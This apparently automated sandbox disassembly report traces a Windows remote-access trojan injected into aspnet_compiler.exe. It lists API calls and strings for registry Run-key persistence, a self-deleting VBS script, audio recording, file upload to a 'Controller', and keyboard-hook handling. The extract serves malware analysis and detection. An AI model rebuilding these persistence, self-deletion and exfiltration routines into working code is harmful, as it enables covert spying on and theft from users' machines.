                                                            • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                          • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                            • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                            • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                            • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                          • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                          • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                          • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                            • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                            • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                            • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                          • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                          • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                            • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                          • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                          • API String ID: 4250697656-2665858469
                                                          • Opcode ID: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                          • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                          • Opcode Fuzzy Hash: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                          • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                          APIs
                                                            • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                            • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                            • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                            • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                            • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                            • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                          • ExitProcess.KERNEL32 ref: 0040C63E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                          • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                          • API String ID: 1861856835-3168347843
                                                          • Opcode ID: 1fca09a02b8493e53294f51d4634f72964b40bbef437048ec22e150e28ca3ccf
                                                          • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                          • Opcode Fuzzy Hash: 1fca09a02b8493e53294f51d4634f72964b40bbef437048ec22e150e28ca3ccf
                                                          • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                          APIs
                                                            • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                            • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                            • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                            • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                            • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                            • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                          • ExitProcess.KERNEL32 ref: 0040C287
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                          • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                          • API String ID: 3797177996-1998216422
                                                          • Opcode ID: c4cc4d00899e4284936be169aaff6719d95b62d3fffb22ecd15678fbb4326d45
                                                          • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                          • Opcode Fuzzy Hash: c4cc4d00899e4284936be169aaff6719d95b62d3fffb22ecd15678fbb4326d45
                                                          • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                          APIs
                                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                          • SetEvent.KERNEL32 ref: 0041A38A
                                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                          • CloseHandle.KERNEL32 ref: 0041A3AB
                                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                          • API String ID: 738084811-1408154895
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                          • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                          • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                          • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Write$Create
                                                          • String ID: RIFF$WAVE$data$fmt
                                                          • API String ID: 1602526932-4212202414
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                          • API String ID: 1646373207-3272542945
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 0040BC75
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                          • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                          • _wcslen.LIBCMT ref: 0040BD54
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                          • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000000,00000000), ref: 0040BDF2
                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                          • _wcslen.LIBCMT ref: 0040BE34
                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                          • ExitProcess.KERNEL32 ref: 0040BED0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                          • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$del$open$BG$BG
                                                          • API String ID: 1579085052-3709896694
                                                          APIs
                                                          • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                          • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                          • lstrlenW.KERNEL32(?), ref: 0041B207
                                                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                          • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                          • _wcslen.LIBCMT ref: 0041B2DB
                                                          • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                          • GetLastError.KERNEL32 ref: 0041B313
                                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                          • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                          • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                          • GetLastError.KERNEL32 ref: 0041B370
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                          • String ID: ?
                                                          • API String ID: 3941738427-1684325040
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$EnvironmentVariable$_wcschr
                                                          • String ID:
                                                          • API String ID: 3899193279-0
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                            • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                            • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                            • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                          • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                          • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                          • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                          • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                          • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                          • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                          • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                          • Sleep.KERNEL32(00000064), ref: 00412060
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                          • String ID: /stext "$HDG$HDG$>G$>G
                                                          • API String ID: 1223786279-3931108886
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                          • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                          • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                          • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                          • API String ID: 2490988753-744132762
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                          • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnumOpen
                                                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                          • API String ID: 1332880857-3714951968
                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                          • GetCursorPos.USER32(?), ref: 0041CAF8
                                                          • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                          • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                          • ExitProcess.KERNEL32 ref: 0041CB74
                                                          • CreatePopupMenu.USER32 ref: 0041CB7A
                                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                          • String ID: Close
                                                          • API String ID: 1657328048-3535843008
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$Info
                                                          • String ID:
                                                          • API String ID: 2509303402-0
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                          • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                          • __aulldiv.LIBCMT ref: 00407FE9
                                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                          • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                          • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                          • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                          • API String ID: 1884690901-3066803209
                                                          APIs
                                                          • Sleep.KERNEL32(00001388), ref: 00409E62
                                                            • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                            • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                            • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                            • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                            • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0040A049
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                          • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                          • API String ID: 3795512280-3163867910
                                                          • Opcode ID: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                          • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                          • Opcode Fuzzy Hash: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                          • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                          • _free.LIBCMT ref: 004500A6
                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                          • _free.LIBCMT ref: 004500C8
                                                          • _free.LIBCMT ref: 004500DD
                                                          • _free.LIBCMT ref: 004500E8
                                                          • _free.LIBCMT ref: 0045010A
                                                          • _free.LIBCMT ref: 0045011D
                                                          • _free.LIBCMT ref: 0045012B
                                                          • _free.LIBCMT ref: 00450136
                                                          • _free.LIBCMT ref: 0045016E
                                                          • _free.LIBCMT ref: 00450175
                                                          • _free.LIBCMT ref: 00450192
                                                          • _free.LIBCMT ref: 004501AA
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
